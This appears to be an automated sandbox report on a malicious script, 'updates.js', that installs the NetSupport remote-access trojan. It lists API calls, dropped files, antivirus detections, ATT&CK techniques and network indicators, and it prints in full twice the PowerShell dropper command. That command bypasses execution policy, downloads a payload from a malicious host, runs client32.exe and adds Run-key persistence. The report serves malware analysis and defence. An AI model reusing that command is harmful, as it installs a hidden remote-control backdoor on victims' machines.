                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,4_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106ABD0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,FindCloseChangeNotification,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_1106ABD0
                                Source: client32.exeBinary or memory string: VMware
                                Source: client32.exeBinary or memory string: VMWare
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI call chain: ExitProcess graph end nodegraph_4-82632
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI call chain: ExitProcess graph end nodegraph_4-83232
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI call chain: ExitProcess graph end nodegraph_4-88897
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,4_2_110B7F30
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,InternetQueryDataAvailable,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,4_2_1117D104
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,4_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,4_2_11031780
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_1116EC49
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF128E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6EF128E1
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,6_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,6_2_11031780
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1116EC49
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,4_2_110F4990
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11113190 GetKeyState,DeviceIoControl,keybd_event,4_2_11113190
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $uetamvcs='http://luxurycaborental.com/cdn-vs/data.php?12105';$xajcg=(new-object system.net.webclient).downloadstring($uetamvcs);$otzwz=[system.convert]::frombase64string($xajcg);$asd = get-random -minimum -10 -maximum 37; $zplwc=[system.environment]::getfolderpath('applicationdata')+'\qchbwpb'+$asd;if (!(test-path $zplwc -pathtype container)) { new-item -path $zplwc -itemtype directory };$p=join-path $zplwc 'tttt.zip';[system.io.file]::writeallbytes($p,$otzwz);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$zplwc)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $zplwc 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $zplwc -force; $fd.attributes='hidden';$s=$zplwc+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='btgeeena';$ds='string';new-itemproperty -path $k -name $v -value $s -propertytype $ds;
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: 4_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,4_2_1109E5B0
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: 4_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,4_2_1109ED30
Source: client32.exe Binary or memory string: Shell_TrayWnd
Source: client32.exe Binary or memory string: Progman
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_11174898
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11174B29
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_11174BCC
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: GetLocaleInfoA,4_2_1116C24E
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_11174796
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_111746A1
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_1117483D
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11174B90
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_11174A69
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_6EF21EB8
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_6EF21E5D
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_6EF20F39
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6EF21CC1
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: GetLocaleInfoA,4_2_6EF2DC99
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_6EF2DC56
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_6EF21DB6
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,4_2_6EF1FAE1
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,4_2_6EF2DB7C
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_11174BCC
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: GetLocaleInfoA,6_2_1116C24E
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_11174796
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_111746A1
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_1117483D
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_11174898
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_11174B29
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_11174B90
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_11174A69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: 4_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,4_2_110F37A0
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: 4_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,4_2_11134830
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: 4_2_11147160 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,4_2_11147160
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: 4_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,4_2_1117594C
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: 4_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,4_2_11145C70
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: 4_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,4_2_11070430
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: 4_2_6EEFA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,4_2_6EEFA980
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe Code function: 6_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,6_2_11070430
Source: Yara match File source: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\QCHBWPB-9\pcicapi.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLL, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 12 Scripting | 2 Valid Accounts | 1 Windows Management Instrumentation | 12 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 12 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 4 Native API | 1 DLL Side-Loading | 2 Valid Accounts | 4 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 22 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 2 Valid Accounts | 21 Access Token Manipulation | 11 Software Packing | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 Command and Scripting Interpreter | 1 Windows Service | 1 Windows Service | 1 DLL Side-Loading | NTDS | 34 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 2 Service Execution | 1 Registry Run Keys / Startup Folder | 13 Process Injection | 1 Masquerading | LSA Secrets | 251 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | 3 PowerShell | RC Scripts | 1 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 13 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1475034 Sample: updates.js Startdate: 17/07/2024 Architecture: WINDOWS Score: 100
DNS/IP: luxurycaborental.com; geo.netsupportsoftware.com
Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures
Processes started: wscript.exe; client32.exe; client32.exe

wscript.exe
Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
Processes started: powershell.exe

powershell.exe
DNS/IP: luxurycaborental.com 38.180.60.246, 49704, 80 COGENT-174US United States
Dropped files: C:\Users\user\AppData\...\remcmdstub.exe, PE32; C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32; C:\Users\user\AppData\...\client32.exe, PE32; 6 other files (5 malicious)
Signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
Processes started: client32.exe; conhost.exe

client32.exe
DNS/IP: 194.180.191.69, 443, 49705 MIVOCLOUDMD unknown; geo.netsupportsoftware.com 104.26.0.231, 49706, 80 CLOUDFLARENETUS United States
Signatures: Multi AV Scanner detection for dropped file; Contains functionalty to change the wallpaper; Delayed program exit found; Contains functionality to detect sleep reduction / modifications

                                No Antivirus matches
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLL | 13% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLL | 5% | ReversingLabs | |
C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLL | 6% | ReversingLabs | |
C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLL | 6% | ReversingLabs | |
C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe | 26% | ReversingLabs | Win32.Trojan.NetSupport |
C:\Users\user\AppData\Roaming\QCHBWPB-9\msvcr100.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\QCHBWPB-9\pcicapi.dll | 3% | ReversingLabs | |
C:\Users\user\AppData\Roaming\QCHBWPB-9\remcmdstub.exe | 24% | ReversingLabs | Win32.Trojan.Generic |
                                No Antivirus matches
                                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe |
https://github.com/apache/incubator-echarts/issues/11369 | 0% | Avira URL Cloud | safe |
http://0.30000000000000004.com/ | 0% | Avira URL Cloud | safe |
https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js | 0% | Avira URL Cloud | safe |
https://jsbench.me/2vkpcekkvw/1) | 0% | Avira URL Cloud | safe |
https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js | 0% | Avira URL Cloud | safe |
http://geo.netsupportsoftware.com/location/loca.asp | 0% | Avira URL Cloud | safe |
https://jsperf.com/try-catch-performance-overhead | 0% | Avira URL Cloud | safe |
https://github.com/apache/echarts/issues/14266 | 0% | Avira URL Cloud | safe |
http://%s/testpage.htm | 0% | Avira URL Cloud | safe |
http://127.0.0.1 | 0% | Avira URL Cloud | safe |
https://momentjs.com/ | 0% | Avira URL Cloud | safe |
https://github.com/apache/incubator-echarts/issues/12229 | 0% | Avira URL Cloud | safe |
http://%s/fakeurl.htm | 0% | Avira URL Cloud | safe |
https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel) | 0% | Avira URL Cloud | safe |
https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalsCompositeOperation | 0% | Avira URL Cloud | safe |
https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js | 0% | Avira URL Cloud | safe |
https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight | 0% | Avira URL Cloud | safe |
http://194.180.191.69/fakeurl.htm | 0% | Avira URL Cloud | safe |
https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf | 0% | Avira URL Cloud | safe |
http://luxurycaborental.com/c | 100% | Avira URL Cloud | malware |
https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js | 0% | Avira URL Cloud | safe |
https://github.com/ecomfe/zrender/blob/master/LICENSE.txt | 0% | Avira URL Cloud | safe |
http://luxurycaborental.com/cdn-vs/data.php?12105 | 100% | Avira URL Cloud | malware |
https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/variableCompositeOperation | 0% | Avira URL Cloud | safe |
https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js | 0% | Avira URL Cloud | safe |
https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment). | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
luxurycaborental.com | 38.180.60.246 | true | true | | unknown
geo.netsupportsoftware.com | 104.26.0.231 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://geo.netsupportsoftware.com/location/loca.asp | false | Avira URL Cloud: safe | unknown
http://194.180.191.69/fakeurl.htm | false | Avira URL Cloud: safe | unknown
http://luxurycaborental.com/cdn-vs/data.php?12105 | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
38.180.60.246 | luxurycaborental.com | United States | 174 | COGENT-174US | true
